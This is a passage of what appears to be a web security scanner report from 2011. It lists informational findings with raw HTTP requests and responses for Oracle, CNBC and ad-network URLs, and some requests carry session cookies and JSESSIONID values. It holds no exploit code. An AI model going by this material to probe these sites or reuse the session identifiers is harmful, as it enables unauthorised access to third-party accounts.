User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; s_nr=1315343797232; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:16:38 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30195555395017574,0)
Last-Modified: Fri, 11 Feb 2011 22:10:22 GMT
Content-Length: 164

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...FIDATx.b......01..(.x.....G.;.....QW~....h,.....FK...l$..._.}..:... ....G...U.....IEND.B`.

29.36. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/logo-oracle-red.png

Request

GET /EndUser/images/logo-oracle-red.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000; s_cc=true; s_nr=1315343660927; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=30186767891789108,1)
Last-Modified: Thu, 29 Oct 2009 05:53:52 GMT
Content-Length: 908

.PNG
.
...IHDR...w...........&.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....Q*A.......d .H....H.b.b.d f..`.....p....a.=M    ..{..........g.t..].Sd...]...D..d.3.............|.....
...[SNIP]...

29.37. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code.js

Request

GET /EndUser/jscripts/s_code.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

29.38. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_popup.js

Request

GET /EndUser/jscripts/s_code_popup.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:38 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 10:28:50 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=161;ecid=30186686287409627,0)
Content-Length: 233

var popupWindow = null;
var flag = 0;

function openPopup(url)
{
try
{
popupWindow = window.open(url, "popup_id", "scrollbars,resizable,width=800,height=600");
}
catch (err)
{
flag = '1' +
...[SNIP]...

29.39. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_code_profile.js

Request

GET /EndUser/jscripts/s_code_profile.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:29:47 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 14 Jul 2010 22:00:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=249;ecid=30186699172311517,0)
Content-Length: 1366

/* Setting the s_account */
function s_setAccount(){

var s_account="";

var curUrl = location.href;

if(curUrl.indexOf(":7101") != -1 || curUrl.indexOf("-mktad") != -1 || curUrl.index
...[SNIP]...

29.40. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/jscripts/s_validation.js

Request

GET /EndUser/jscripts/s_validation.js;jsessionid=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=http://forums.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:35 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0)
Content-Length: 4274

/* Used to attach and remove error message which are not set or removed on
* server side validators.
*/
function checkOnLoad()
{
var inputs = document.getElementsByTagName('input');
var spans =
...[SNIP]...

29.41. http://now.eloqua.com/visitor/v200/svrGP.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2429&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&tzo=360&ms=530 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

29.42. http://optimized-by.rubiconproject.com/a/dk.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1968

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

29.43. http://pro.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: pro.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 24 Sep 2010 11:40:39 GMT
Accept-Ranges: bytes
ETag: "2665ab4fdd5bcb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:07 GMT
Via: 1.1 aicache6
Content-Length: 128
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>
   <script type="text/javascript">
   location.href = "index.asp";
   </script>
</head>
<body>

</body>
</html>

29.44. http://pro.cnbc.com/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pro.cnbc.com
Path:   /index.asp

Request

GET /index.asp HTTP/1.1
Host: pro.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA; x_debug_lvl=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Tue, 06 Sep 2011 15:01:09 GMT
Server: Microsoft-IIS/7.0
Date: Tue, 06 Sep 2011 15:02:08 GMT
Via: 1.1 aicache6
Content-Length: 194
X-Aicache-OS: 216.151.182.3:80
Connection: Keep-Alive
Keep-Alive: max=20

<script type="text/javascript">window.top.location='http://login.cnbc.com/tpauth/rest/authenticate?source=subscription&source_type=pro&apphome='+encodeURIComponent(window.top.location);</script>

29.45. https://register.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 13 Aug 2009 22:54:28 GMT
ETag: "3b-4710dd15eb100"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

<script>
window.location="http://www.cnbc.com";
</script>

29.46. https://register.cnbc.com/RandomImage.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /RandomImage.jsp

Request

GET /RandomImage.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/
Content-Length: 2261

...[SNIP]...

29.47. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity: Information
Confidence: Certain
Host: http://snas.nbcuni.com
Path: /snas/api/getRemoteDomainCookies

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:38 GMT
Content-Length: 167
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

29.48. https://support.oracle.com/

Summary

Severity: Information
Confidence: Certain
Host: https://support.oracle.com
Path: /

Request

GET / HTTP/1.1
Host: support.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:16 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecb-9f-4aa5b4f3d35c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 159
Keep-Alive: timeout=15, max=1799
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<HTML>
<HEAD>
<title>Oracle Configuration Support Manager</title>
<meta http-equiv="REFRESH" content="0;url=/CSP/ui/flash.html"></HEAD>
<BODY>
</BODY>
</HTML>

29.49. https://support.oracle.com/CSP/ui/xml/sunConnect.html

Summary

Severity: Information
Confidence: Certain
Host: https://support.oracle.com
Path: /CSP/ui/xml/sunConnect.html

Request

GET /CSP/ui/xml/sunConnect.html HTTP/1.1
Host: support.oracle.com
Connection: keep-alive
Referer: https://support.oracle.com/CSP/ui/flash.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_nr=1315343469265; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; BIGipServersupport_http_pool1=590844557.24862.0000; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Aheader%25253Acreateorupdateservicerequest%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:17 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Tue, 09 Aug 2011 00:21:30 GMT
ETag: "13ec3f8-1ea-4aa078b92f680"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 490
Keep-Alive: timeout=15, max=1793
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<html>
<head>
<script type="text/javascript">

function connectByForm(sessionToken, sunConnectUrl, doc) {

var form = doc.getElementById("connectByForm");

if (sessionToken) {
var stElem = doc
...[SNIP]...

29.50. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

Summary

Severity: Information
Confidence: Certain
Host: http://tag.admeld.com
Path: /ad/iframe/677/cnbc/300x250/atf

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
